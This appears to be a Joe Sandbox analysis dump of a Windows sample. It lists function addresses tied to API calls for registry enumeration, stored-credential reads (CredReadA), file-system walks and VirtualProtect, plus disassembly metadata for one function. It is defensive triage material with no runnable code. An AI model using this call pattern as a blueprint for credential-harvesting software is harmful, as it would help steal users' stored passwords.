API calls 33409->33412 33411 407a43 33410->33411 33413 40796e 7 API calls 33411->33413 33412->33411 33413->33338 33430 406f96 GetModuleFileNameA 33414->33430 33416 409805 strrchr 33417 409814 33416->33417 33418 409817 _mbscat 33416->33418 33417->33418 33418->33356 33431 44b090 33419->33431 33424 40930c 3 API calls 33425 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33424->33425 33426 4097c5 LoadStringA 33425->33426 33429 4097db 33426->33429 33428 4097f3 33428->33277 33429->33426 33429->33428 33438 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33429->33438 33430->33416 33432 40973e _mbscpy _mbscpy 33431->33432 33433 40930c 33432->33433 33434 44b090 33433->33434 33435 409319 memset GetPrivateProfileStringA 33434->33435 33436 409374 33435->33436 33437 409364 WritePrivateProfileStringA 33435->33437 33436->33424 33437->33436 33438->33429 33449 406f81 GetFileAttributesA 33439->33449 33441 409675 33442 4096ee 33441->33442 33443 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33441->33443 33442->33278 33450 409278 GetPrivateProfileStringA 33443->33450 33445 4096c9 33451 409278 GetPrivateProfileStringA 33445->33451 33447 4096da 33452 409278 GetPrivateProfileStringA 33447->33452 33449->33441 33450->33445 33451->33447 33452->33442 33544 409c1c 33453->33544 33456 401e69 memset 33583 410dbb 33456->33583 33459 401ec2 33613 4070e3 strlen _mbscat _mbscpy _mbscat 33459->33613 33460 401ed4 33598 406f81 GetFileAttributesA 33460->33598 33463 401ee6 strlen strlen 33465 401f15 33463->33465 33467 401f28 33463->33467 33614 4070e3 strlen _mbscat _mbscpy _mbscat 33465->33614 33599 406f81 GetFileAttributesA 33467->33599 33469 401f35 33600 401c31 33469->33600 33472 401f75 33612 410a9c RegOpenKeyExA 33472->33612 33474 401c31 7 API calls 33474->33472 33475 401f91 33476 402187 33475->33476 33477 401f9c memset 33475->33477 33479 402195 ExpandEnvironmentStringsA 33476->33479 33480 4021a8 _strcmpi 33476->33480 33615 410b62 RegEnumKeyExA 33477->33615 33624 406f81 GetFileAttributesA 33479->33624 33480->33370 33480->33371 33482 40217e RegCloseKey 33482->33476 33483 401fd9 atoi 33484 401fef memset memset sprintf 33483->33484 33492 401fc9 33483->33492 33616 410b1e 33484->33616 33487 402165 33487->33482 33488 406f81 GetFileAttributesA 33488->33492 33489 402076 memset memset strlen strlen 33489->33492 33490 4070e3 strlen _mbscat _mbscpy _mbscat 33490->33492 33491 4020dd strlen strlen 33491->33492 33492->33482 33492->33483 33492->33487 33492->33488 33492->33489 33492->33490 33492->33491 33493 402167 _mbscpy 33492->33493 33623 410b62 RegEnumKeyExA 33492->33623 33493->33482 33495 40c422 33494->33495 33496 40c425 _mbscat _mbscpy _mbscpy 33494->33496 33495->33496 33497 40c49d 33496->33497 33498 40c512 33497->33498 33499 40c502 GetWindowPlacement 33497->33499 33500 40c538 33498->33500 33645 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33498->33645 33499->33498 33638 409b31 33500->33638 33504 40ba28 33505 40ba87 33504->33505 33511 40ba3c 33504->33511 33648 406c62 LoadCursorA SetCursor 33505->33648 33507 40ba43 _mbsicmp 33507->33511 33508 40ba8c 33649 410a9c RegOpenKeyExA 33508->33649 33650 404785 33508->33650 33653 403c16 33508->33653 33729 4107f1 33508->33729 33732 404734 33508->33732 33509 40baa0 33510 407e30 _strcmpi 33509->33510 33514 40bab0 33510->33514 33511->33505 33511->33507 33740 40b5e5 10 API calls 33511->33740 33512 40bafa SetCursor 33512->33377 33514->33512 33515 40baf1 qsort 33514->33515 33515->33512 34103 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33521->34103 33523 40b00e 33524 40b016 33523->33524 33525 40b01f GetStdHandle 33523->33525 34104 406d1a CreateFileA 33524->34104 33527 40b01c 33525->33527 33528 40b035 33527->33528 33529 40b12d 33527->33529 34105 406c62 LoadCursorA SetCursor 33528->34105 34109 406d77 9 API calls 33529->34109 33532 40b136 33543 40c580 28 API calls 33532->33543 33533 40b042 33535 40b087 33533->33535 33540 40b0a1 33533->33540 34106 40a57c strlen WriteFile 33533->34106 33535->33540 34107 40a699 12 API calls 33535->34107 33537 40b0d6 33538 40b116 CloseHandle 33537->33538 33539 40b11f SetCursor 33537->33539 33538->33539 33539->33532 33540->33537 34108 406d77 9 API calls 33540->34108 33542->33371 33543->33374 33556 409a32 33544->33556 33547 409c80 memcpy memcpy 33548 409cda 33547->33548 33548->33547 33549 409d18 ??2@YAPAXI ??2@YAPAXI 33548->33549 33553 408db6 12 API calls 33548->33553 33550 409d54 ??2@YAPAXI 33549->33550 33552 409d8b 33549->33552 33550->33552 33566 409b9c 33552->33566 33553->33548 33555 4023c1 33555->33456 33557 409a44 33556->33557 33558 409a3d ??3@YAXPAX 33556->33558 33559 409a52 33557->33559 33560 409a4b ??3@YAXPAX 33557->33560 33558->33557 33561 409a63 33559->33561 33562 409a5c ??3@YAXPAX 33559->33562 33560->33559 33563 409a83 ??2@YAPAXI ??2@YAPAXI 33561->33563 33564 409a73 ??3@YAXPAX 33561->33564 33565 409a7c ??3@YAXPAX 33561->33565 33562->33561 33563->33547 33564->33565 33565->33563 33567 407a55 ??3@YAXPAX 33566->33567 33568 409ba5 33567->33568 33569 407a55 ??3@YAXPAX 33568->33569 33570 409bad 33569->33570 33571 407a55 ??3@YAXPAX 33570->33571 33572 409bb5 33571->33572 33573 407a55 ??3@YAXPAX 33572->33573 33574 409bbd 33573->33574 33575 407a1f 4 API calls 33574->33575 33576 409bd0 33575->33576 33577 407a1f 4 API calls 33576->33577 33578 409bda 33577->33578 33579 407a1f 4 API calls 33578->33579 33580 409be4 33579->33580 33581 407a1f 4 API calls 33580->33581 33582 409bee 33581->33582 33582->33555 33584 410d0e 2 API calls 33583->33584 33585 410dca 33584->33585 33586 410dfd memset 33585->33586 33625 4070ae 33585->33625 33587 410e1d 33586->33587 33628 410a9c RegOpenKeyExA 33587->33628 33591 401e9e strlen strlen 33591->33459 33591->33460 33592 410e4a 33593 410e7f _mbscpy 33592->33593 33629 410d3d _mbscpy 33592->33629 33593->33591 33595 410e5b 33630 410add RegQueryValueExA 33595->33630 33597 410e73 RegCloseKey 33597->33593 33598->33463 33599->33469 33631 410a9c RegOpenKeyExA 33600->33631 33602 401c4c 33603 401cad 33602->33603 33632 410add RegQueryValueExA 33602->33632 33603->33472 33603->33474 33605 401c6a 33606 401c71 strchr 33605->33606 33607 401ca4 RegCloseKey 33605->33607 33606->33607 33608 401c85 strchr 33606->33608 33607->33603 33608->33607 33609 401c94 33608->33609 33633 406f06 strlen 33609->33633 33611 401ca1 33611->33607 33612->33475 33613->33460 33614->33467 33615->33492 33636 410a9c RegOpenKeyExA 33616->33636 33618 410b34 33619 410b5d 33618->33619 33637 410add RegQueryValueExA 33618->33637 33619->33492 33621 410b4c RegCloseKey 33621->33619 33623->33492 33624->33480 33626 4070bd GetVersionExA 33625->33626 33627 4070ce 33625->33627 33626->33627 33627->33586 33627->33591 33628->33592 33629->33595 33630->33597 33631->33602 33632->33605 33634 406f17 33633->33634 33635 406f1a memcpy 33633->33635 33634->33635 33635->33611 33636->33618 33637->33621 33639 409b40 33638->33639 33641 409b4e 33638->33641 33646 409901 memset SendMessageA 33639->33646 33642 409b99 33641->33642 33643 409b8b 33641->33643 33642->33504 33647 409868 SendMessageA 33643->33647 33645->33500 33646->33641 33647->33642 33648->33508 33649->33509 33651 4047a3 33650->33651 33652 404799 FreeLibrary 33650->33652 33651->33509 33652->33651 33654 4107f1 FreeLibrary 33653->33654 33655 403c30 LoadLibraryA 33654->33655 33656 403c74 33655->33656 33657 403c44 GetProcAddress 33655->33657 33658 4107f1 FreeLibrary 33656->33658 33657->33656 33659 403c5e 33657->33659 33660 403c7b 33658->33660 33659->33656 33662 403c6b 33659->33662 33661 404734 3 API calls 33660->33661 33663 403c86 33661->33663 33662->33660 33741 4036e5 33663->33741 33666 4036e5 26 API calls 33667 403c9a 33666->33667 33668 4036e5 26 API calls 33667->33668 33669 403ca4 33668->33669 33670 4036e5 26 API calls 33669->33670 33671 403cae 33670->33671 33753 4085d2 33671->33753 33679 403ce5 33680 403cf7 33679->33680 33934 402bd1 39 API calls 33679->33934 33799 410a9c RegOpenKeyExA 33680->33799 33683 403d0a 33684 403d1c 33683->33684 33935 402bd1 39 API calls 33683->33935 33800 402c5d 33684->33800 33688 4070ae GetVersionExA 33689 403d31 33688->33689 33818 410a9c RegOpenKeyExA 33689->33818 33691 403d51 33692 403d61 33691->33692 33936 402b22 46 API calls 33691->33936 33819 410a9c RegOpenKeyExA 33692->33819 33695 403d87 33696 403d97 33695->33696 33937 402b22 46 API calls 33695->33937 33820 410a9c RegOpenKeyExA 33696->33820 33699 403dbd 33700 403dcd 33699->33700 33938 402b22 46 API calls 33699->33938 33821 410808 33700->33821 33704 404785 FreeLibrary 33705 403de8 33704->33705 33825 402fdb 33705->33825 33708 402fdb 34 API calls 33709 403e00 33708->33709 33841 4032b7 33709->33841 33718 403e3b 33720 403e73 33718->33720 33721 403e46 _mbscpy 33718->33721 33888 40fb00 33720->33888 33940 40f334 334 API calls 33721->33940 33730 410807 33729->33730 33731 4107fc FreeLibrary 33729->33731 33730->33509 33731->33730 33733 404785 FreeLibrary 33732->33733 33734 40473b LoadLibraryA 33733->33734 33735 40474c GetProcAddress 33734->33735 33738 40476e 33734->33738 33736 404764 33735->33736 33735->33738 33736->33738 33737 404781 33737->33509 33738->33737 33739 404785 FreeLibrary 33738->33739 33739->33737 33740->33511 33742 4037c5 33741->33742 33743 4036fb 33741->33743 33742->33666 33941 410863 UuidFromStringA UuidFromStringA memcpy 33743->33941 33745 40370e 33745->33742 33746 403716 strchr 33745->33746 33746->33742 33747 403730 33746->33747 33942 4021b6 memset 33747->33942 33749 40373f _mbscpy _mbscpy strlen 33750 4037a4 _mbscpy 33749->33750 33751 403789 sprintf 33749->33751 33943 4023e5 16 API calls 33750->33943 33751->33750 33754 4085e2 33753->33754 33944 4082cd 11 API calls 33754->33944 33758 408600 33759 403cba 33758->33759 33760 40860b memset 33758->33760 33771 40821d 33759->33771 33947 410b62 RegEnumKeyExA 33760->33947 33762 4086d2 RegCloseKey 33762->33759 33764 408637 33764->33762 33765 40865c memset 33764->33765 33948 410a9c RegOpenKeyExA 33764->33948 33951 410b62 RegEnumKeyExA 33764->33951 33949 410add RegQueryValueExA 33765->33949 33768 408694 33950 40848b 10 API calls 33768->33950 33770 4086ab RegCloseKey 33770->33764 33952 410a9c RegOpenKeyExA 33771->33952 33773 40823f 33774 403cc6 33773->33774 33775 408246 memset 33773->33775 33783 4086e0 33774->33783 33953 410b62 RegEnumKeyExA 33775->33953 33777 4082bf RegCloseKey 33777->33774 33779 40826f 33779->33777 33954 410a9c RegOpenKeyExA 33779->33954 33955 4080ed 11 API calls 33779->33955 33956 410b62 RegEnumKeyExA 33779->33956 33782 4082a2 RegCloseKey 33782->33779 33957 4045db 33783->33957 33785 4088ef 33965 404656 33785->33965 33789 408737 wcslen 33789->33785 33795 40876a 33789->33795 33790 40877a _wcsncoll 33790->33795 33792 404734 3 API calls 33792->33795 33793 404785 FreeLibrary 33793->33795 33794 408812 memset 33794->33795 33796 40883c memcpy wcschr 33794->33796 33795->33785 33795->33790 33795->33792 33795->33793 33795->33794 33795->33796 33797 4088c3 LocalFree 33795->33797 33968 40466b _mbscpy 33795->33968 33796->33795 33797->33795 33798 410a9c RegOpenKeyExA 33798->33679 33799->33683 33969 410a9c RegOpenKeyExA 33800->33969 33802 402c7a 33803 402da5 33802->33803 33804 402c87 memset 33802->33804 33803->33688 33970 410b62 RegEnumKeyExA 33804->33970 33806 402d9c RegCloseKey 33806->33803 33807 402cb2 33807->33806 33808 410b1e 3 API calls 33807->33808 33817 402d9a 33807->33817 33974 402bd1 39 API calls 33807->33974 33975 410b62 RegEnumKeyExA 33807->33975 33809 402ce4 memset sprintf 33808->33809 33971 410a9c RegOpenKeyExA 33809->33971 33811 402d28 33812 402d3a sprintf 33811->33812 33972 402bd1 39 API calls 33811->33972 33973 410a9c RegOpenKeyExA 33812->33973 33817->33806 33818->33691 33819->33695 33820->33699 33822 410816 33821->33822 33823 4107f1 FreeLibrary 33822->33823 33824 403ddd 33823->33824 33824->33704 33976 410a9c RegOpenKeyExA 33825->33976 33827 402ff9 33828 403006 memset 33827->33828 33829 40312c 33827->33829 33977 410b62 RegEnumKeyExA 33828->33977 33829->33708 33831 403122 RegCloseKey 33831->33829 33832 410b1e 3 API calls 33833 403058 memset sprintf 33832->33833 33978 410a9c RegOpenKeyExA 33833->33978 33835 4030a2 memset 33979 410b62 RegEnumKeyExA 33835->33979 33836 410b62 RegEnumKeyExA 33840 403033 33836->33840 33838 4030f9 RegCloseKey 33838->33840 33840->33831 33840->33832 33840->33835 33840->33836 33840->33838 33980 402db3 26 API calls 33840->33980 33842 4032d5 33841->33842 33843 4033a9 33841->33843 33981 4021b6 memset 33842->33981 33856 4034e4 memset memset 33843->33856 33845 4032e1 33982 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33845->33982 33847 4032ea 33848 4032f8 memset GetPrivateProfileSectionA 33847->33848 33983 4023e5 16 API calls 33847->33983 33848->33843 33853 40332f 33848->33853 33850 40339b strlen 33850->33843 33850->33853 33852 403350 strchr 33852->33853 33853->33843 33853->33850 33984 4021b6 memset 33853->33984 33985 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33853->33985 33986 4023e5 16 API calls 33853->33986 33857 410b1e 3 API calls 33856->33857 33858 40353f 33857->33858 33859 40357f 33858->33859 33860 403546 _mbscpy 33858->33860 33864 403985 33859->33864 33987 406d55 strlen _mbscat 33860->33987 33862 403565 _mbscat 33988 4033f0 19 API calls 33862->33988 33989 40466b _mbscpy 33864->33989 33868 4039aa 33870 4039ff 33868->33870 33990 40f460 memset memset 33868->33990 34011 40f6e2 33868->34011 34029 4038e8 21 API calls 33868->34029 33871 404785 FreeLibrary 33870->33871 33872 403a0b 33871->33872 33873 4037ca memset memset 33872->33873 34037 444551 memset 33873->34037 33875 4038e2 33875->33718 33939 40f334 334 API calls 33875->33939 33878 40382e 33879 406f06 2 API calls 33878->33879 33880 403843 33879->33880 33881 406f06 2 API calls 33880->33881 33882 403855 strchr 33881->33882 33883 403884 _mbscpy 33882->33883 33884 403897 strlen 33882->33884 33885 4038bf _mbscpy 33883->33885 33884->33885 33886 4038a4 sprintf 33884->33886 34049 4023e5 16 API calls 33885->34049 33886->33885 33889 44b090 33888->33889 33890 40fb10 RegOpenKeyExA 33889->33890 33891 403e7f 33890->33891 33892 40fb3b RegOpenKeyExA 33890->33892 33902 40f96c 33891->33902 33893 40fb55 RegQueryValueExA 33892->33893 33894 40fc2d RegCloseKey 33892->33894 33895 40fc23 RegCloseKey 33893->33895 33896 40fb84 33893->33896 33894->33891 33895->33894 33897 404734 3 API calls 33896->33897 33898 40fb91 33897->33898 33898->33895 33899 40fc19 LocalFree 33898->33899 33900 40fbdd memcpy memcpy 33898->33900 33899->33895 34054 40f802 11 API calls 33900->34054 33903 4070ae GetVersionExA 33902->33903 33904 40f98d 33903->33904 33905 4045db 7 API calls 33904->33905 33913 40f9a9 33905->33913 33906 40fae6 33907 404656 FreeLibrary 33906->33907 33908 403e85 33907->33908 33914 4442ea memset 33908->33914 33909 40fa13 memset WideCharToMultiByte 33910 40fa43 _strnicmp 33909->33910 33909->33913 33911 40fa5b WideCharToMultiByte 33910->33911 33910->33913 33912 40fa88 WideCharToMultiByte 33911->33912 33911->33913 33912->33913 33913->33906 33913->33909 33915 410dbb 9 API calls 33914->33915 33916 444329 33915->33916 34055 40759e strlen strlen 33916->34055 33921 410dbb 9 API calls 33922 444350 33921->33922 33923 40759e 3 API calls 33922->33923 33924 44435a 33923->33924 33925 444212 65 API calls 33924->33925 33926 444366 memset memset 33925->33926 33927 410b1e 3 API calls 33926->33927 33928 4443b9 ExpandEnvironmentStringsA strlen 33927->33928 33929 4443f4 _strcmpi 33928->33929 33930 4443e5 33928->33930 33931 403e91 33929->33931 33932 44440c 33929->33932 33930->33929 33931->33509 33933 444212 65 API calls 33932->33933 33933->33931 33934->33680 33935->33684 33936->33692 33937->33696 33938->33700 33939->33718 33940->33720 33941->33745 33942->33749 33943->33742 33945 40841c 33944->33945 33946 410a9c RegOpenKeyExA 33945->33946 33946->33758 33947->33764 33948->33764 33949->33768 33950->33770 33951->33764 33952->33773 33953->33779 33954->33779 33955->33782 33956->33779 33958 404656 FreeLibrary 33957->33958 33959 4045e3 LoadLibraryA 33958->33959 33960 404651 33959->33960 33961 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33959->33961 33960->33785 33960->33789 33962 40463d 33961->33962 33963 404643 33962->33963 33964 404656 FreeLibrary 33962->33964 33963->33960 33964->33960 33966 403cd2 33965->33966 33967 40465c FreeLibrary 33965->33967 33966->33798 33967->33966 33968->33795 33969->33802 33970->33807 33971->33811 33972->33812 33973->33807 33974->33807 33975->33807 33976->33827 33977->33840 33978->33840 33979->33840 33980->33840 33981->33845 33982->33847 33983->33848 33984->33852 33985->33853 33986->33853 33987->33862 33988->33859 33989->33868 34030 4078ba 33990->34030 33993 4078ba _mbsnbcat 33994 40f5a3 RegOpenKeyExA 33993->33994 33995 40f5c3 RegQueryValueExA 33994->33995 33996 40f6d9 33994->33996 33997 40f6d0 RegCloseKey 33995->33997 33998 40f5f0 33995->33998 33996->33868 33997->33996 33998->33997 33999 40f675 33998->33999 34034 40466b _mbscpy 33998->34034 33999->33997 34035 4012ee strlen 33999->34035 34001 40f611 34003 404734 3 API calls 34001->34003 34008 40f616 34003->34008 34004 40f69e RegQueryValueExA 34004->33997 34005 40f6c1 34004->34005 34005->33997 34006 40f66a 34007 404785 FreeLibrary 34006->34007 34007->33999 34008->34006 34009 40f661 LocalFree 34008->34009 34010 40f645 memcpy 34008->34010 34009->34006 34010->34009 34036 40466b _mbscpy 34011->34036 34013 40f6fa 34014 4045db 7 API calls 34013->34014 34015 40f708 34014->34015 34016 404734 3 API calls 34015->34016 34023 40f7e2 34015->34023 34018 40f715 34016->34018 34017 404656 FreeLibrary 34019 40f7f1 34017->34019 34020 40f71d CredReadA 34018->34020 34018->34023 34021 404785 FreeLibrary 34019->34021 34020->34023 34024 40f734 34020->34024 34022 40f7fc 34021->34022 34022->33868 34023->34017 34024->34023 34025 40f797 WideCharToMultiByte 34024->34025 34026 40f7b8 strlen 34025->34026 34027 40f7d9 LocalFree 34025->34027 34026->34027 34028 40f7c8 _mbscpy 34026->34028 34027->34023 34028->34027 34029->33868 34031 4078e6 34030->34031 34032 4078c7 _mbsnbcat 34031->34032 34033 4078ea 34031->34033 34032->34031 34033->33993 34034->34001 34035->34004 34036->34013 34050 410a9c RegOpenKeyExA 34037->34050 34039 44458b 34040 40381a 34039->34040 34051 410add RegQueryValueExA 34039->34051 34040->33875 34048 4021b6 memset 34040->34048 34042 4445a4 34043 4445dc RegCloseKey 34042->34043 34052 410add RegQueryValueExA 34042->34052 34043->34040 34045 4445c1 34045->34043 34053 444879 30 API calls 34045->34053 34047 4445da 34047->34043 34048->33878 34049->33875 34050->34039 34051->34042 34052->34045 34053->34047 34054->33899 34056 4075c9 34055->34056 34057 4075bb _mbscat 34055->34057 34058 444212 34056->34058 34057->34056 34075 407e9d 34058->34075 34061 44424d 34062 444274 34061->34062 34063 444258 34061->34063 34083 407ef8 34061->34083 34064 407e9d 9 API calls 34062->34064 34100 444196 52 API calls 34063->34100 34071 4442a0 34064->34071 34066 407ef8 9 API calls 34066->34071 34067 4442ce 34097 407f90 34067->34097 34071->34066 34071->34067 34073 444212 65 API calls 34071->34073 34093 407e62 34071->34093 34072 407f90 FindClose 34074 4442e4 34072->34074 34073->34071 34074->33921 34076 407f90 FindClose 34075->34076 34077 407eaa 34076->34077 34078 406f06 2 API calls 34077->34078 34079 407ebd strlen strlen 34078->34079 34080 407ee1 34079->34080 34081 407eea 34079->34081 34101 4070e3 strlen _mbscat _mbscpy _mbscat 34080->34101 34081->34061 34084 407f03 FindFirstFileA 34083->34084 34085 407f24 FindNextFileA 34083->34085 34086 407f3f 34084->34086 34087 407f46 strlen strlen 34085->34087 34088 407f3a 34085->34088 34086->34087 34090 407f7f 34086->34090 34087->34090 34091 407f76 34087->34091 34089 407f90 FindClose 34088->34089 34089->34086 34090->34061 34102 4070e3 strlen _mbscat _mbscpy _mbscat 34091->34102 34094 407e6c strcmp 34093->34094 34096 407e94 34093->34096 34095 407e83 strcmp 34094->34095 34094->34096 34095->34096 34096->34071 34098 407fa3 34097->34098 34099 407f99 FindClose 34097->34099 34098->34072 34099->34098 34100->34061 34101->34081 34102->34090 34103->33523 34104->33527 34105->33533 34106->33535 34107->33540 34108->33537 34109->33532 34118 411853 RtlInitializeCriticalSection memset 34119 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34292 40a256 13 API calls 34294 432e5b 17 API calls 34296 43fa5a 20 API calls 34121 401060 41 API calls 34299 427260 CloseHandle memset memset 33197 410c68 FindResourceA 33198 410c81 SizeofResource 33197->33198 33200 410cae 33197->33200 33199 410c92 LoadResource 33198->33199 33198->33200 33199->33200 33201 410ca0 LockResource 33199->33201 33201->33200 34301 405e69 14 API calls 34126 433068 15 API calls __fprintf_l 34303 414a6d 18 API calls 34304 43fe6f 134 API calls 34128 424c6d 15 API calls __fprintf_l 34305 426741 19 API calls 34130 440c70 17 API calls 34131 443c71 44 API calls 34134 427c79 24 API calls 34308 416e7e memset __fprintf_l 34138 42800b 47 API calls 34139 425115 85 API calls __fprintf_l 34311 41960c 61 API calls 34140 43f40c 122 API calls __fprintf_l 34143 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34144 43f81a 20 API calls 34146 414c20 memset memset 34147 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34315 414625 18 API calls 34316 404225 modf 34317 403a26 strlen WriteFile 34319 40422a 12 API calls 34323 427632 memset memset memcpy 34324 40ca30 59 API calls 34325 404235 26 API calls 34148 42ec34 61 API calls __fprintf_l 34149 425115 76 API calls __fprintf_l 34326 425115 77 API calls __fprintf_l 34328 44223a 38 API calls 34155 43183c 112 API calls 34329 44b2c5 _onexit __dllonexit 34334 42a6d2 memcpy __allrem 34157 405cda 65 API calls 34342 43fedc 138 API calls 34343 4116e1 16 API calls __fprintf_l 34160 4244e6 19 API calls 34162 42e8e8 127 API calls __fprintf_l 34163 4118ee RtlLeaveCriticalSection 34348 43f6ec 22 API calls 34165 425115 119 API calls __fprintf_l 33187 410cf3 EnumResourceNamesA 34351 4492f0 memcpy memcpy 34353 43fafa 18 API calls 34355 4342f9 15 API calls __fprintf_l 34166 4144fd 19 API calls 34357 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34358 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34361 443a84 _mbscpy 34363 43f681 17 API calls 34169 404487 22 API calls 34365 415e8c 16 API calls __fprintf_l 34173 411893 RtlDeleteCriticalSection __fprintf_l 34174 41a492 42 API calls 34369 403e96 34 API calls 34370 410e98 memset SHGetPathFromIDList SendMessageA 34176 426741 109 API calls __fprintf_l 34177 4344a2 18 API calls 34178 4094a2 10 API calls 34373 4116a6 15 API calls __fprintf_l 34374 43f6a4 17 API calls 34375 440aa3 20 API calls 34377 427430 45 API calls 34181 4090b0 7 API calls 34182 4148b0 15 API calls 34184 4118b4 RtlEnterCriticalSection 34185 4014b7 CreateWindowExA 34186 40c8b8 19 API calls 34188 4118bf RtlTryEnterCriticalSection 34382 42434a 18 API calls __fprintf_l 34384 405f53 12 API calls 34196 43f956 59 API calls 34198 40955a 17 API calls 34199 428561 36 API calls 34200 409164 7 API calls 34388 404366 19 API calls 34392 40176c ExitProcess 34395 410777 42 API calls 34205 40dd7b 51 API calls 34206 425d7c 16 API calls __fprintf_l 34397 43f6f0 25 API calls 34398 42db01 22 API calls 34207 412905 15 API calls __fprintf_l 34399 403b04 54 API calls 34400 405f04 SetDlgItemTextA GetDlgItemTextA 34401 44b301 ??3@YAXPAX 34404 4120ea 14 API calls 3 library calls 34405 40bb0a 8 API calls 34407 413f11 strcmp 34211 434110 17 API calls __fprintf_l 34214 425115 108 API calls __fprintf_l 34408 444b11 _onexit 34216 425115 76 API calls __fprintf_l 34219 429d19 10 API calls 34411 444b1f __dllonexit 34412 409f20 _strcmpi 34221 42b927 31 API calls 34415 433f26 19 API calls __fprintf_l 34416 44b323 FreeLibrary 34417 427f25 46 API calls 34418 43ff2b 17 API calls 34419 43fb30 19 API calls 34228 414d36 16 API calls 34230 40ad38 7 API calls 34421 433b38 16 API calls __fprintf_l 34422 44b33b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 34234 426741 21 API calls 34235 40c5c3 125 API calls 34237 43fdc5 17 API calls 34423 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34240 4161cb memcpy memcpy memcpy memcpy 33202 44b3cf 33203 44b3e6 33202->33203 33205 44b454 33202->33205 33203->33205 33209 44b40e 33203->33209 33206 44b405 33206->33205 33207 44b435 VirtualProtect 33206->33207 33207->33205 33208 44b444 VirtualProtect 33207->33208 33208->33205 33210 44b413 33209->33210 33213 44b454 33210->33213 33216 44b42b 33210->33216 33212 44b41c 33212->33213 33214 44b435 VirtualProtect 33212->33214 33214->33213 33215 44b444 VirtualProtect 33214->33215 33215->33213 33217 44b431 33216->33217 33218 44b435 VirtualProtect 33217->33218 33220 44b454 33217->33220 33219 44b444 VirtualProtect 33218->33219 33218->33220 33219->33220 34428 43ffc8 18 API calls 34241 4281cc 15 API calls __fprintf_l 34430 4383cc 110 API calls __fprintf_l 34242 4275d3 41 API calls 34431 4153d3 22 API calls __fprintf_l 34243 444dd7 _XcptFilter 34436 4013de 15 API calls 34438 425115 111 API calls __fprintf_l 34439 43f7db 18 API calls 34442 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34245 4335ee 16 API calls __fprintf_l 34444 429fef 11 API calls 34246 444deb _exit _c_exit 34445 40bbf0 138 API calls 34249 425115 79 API calls __fprintf_l 34449 437ffa 22 API calls 34253 4021ff 14 API calls 34254 43f5fc 149 API calls 34450 40e381 9 API calls 34256 405983 40 API calls 34257 42b186 27 API calls __fprintf_l 34258 427d86 76 API calls 34259 403585 20 API calls 34261 42e58e 18 API calls __fprintf_l 34264 425115 75 API calls __fprintf_l 34266 401592 8 API calls 33188 410b92 33191 410a6b 33188->33191 33190 410bb2 33192 410a77 33191->33192 33193 410a89 GetPrivateProfileIntA 33191->33193 33196 410983 memset _itoa WritePrivateProfileStringA 33192->33196 33193->33190 33195 410a84 33195->33190 33196->33195 34454 434395 16 API calls 34268 441d9c memcmp 34456 43f79b 119 API calls 34269 40c599 43 API calls 34457 426741 87 API calls 34273 4401a6 21 API calls 34275 426da6 memcpy memset memset memcpy 34276 4335a5 15 API calls 34278 4299ab memset memset memcpy memset memset 34279 40b1ab 8 API calls 34462 425115 76 API calls __fprintf_l 34466 4113b2 18 API calls 2 library calls 34470 40a3b8 memset sprintf SendMessageA 33221 410bbc 33224 4109cf 33221->33224 33225 4109dc 33224->33225 33226 410a23 memset GetPrivateProfileStringA 33225->33226 33227 4109ea memset 33225->33227 33232 407646 strlen 33226->33232 33237 4075cd sprintf memcpy 33227->33237 33230 410a0c WritePrivateProfileStringA 33231 410a65 33230->33231 33233 40765a 33232->33233 33234 40765c 33232->33234 33233->33231 33235 4076a3 33234->33235 33238 40737c strtoul 33234->33238 33235->33231 33237->33230 33238->33234 34281 40b5bf memset memset _mbsicmp

                                                                                                                Executed Functions

                                                                                                                Function 004082CD Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 145stringCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040832F
                                                                                                                • memset.MSVCRT ref: 00408343
                                                                                                                • memset.MSVCRT ref: 0040835F
                                                                                                                • memset.MSVCRT ref: 00408376
                                                                                                                • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                • strlen.MSVCRT ref: 004083E9
                                                                                                                • strlen.MSVCRT ref: 004083F8
                                                                                                                • memcpy.MSVCRT ref: 0040840A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                                • String ID: 5$H$O$b$i$}$}
                                                                                                                • API String ID: 1832431107-3760989150
                                                                                                                • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
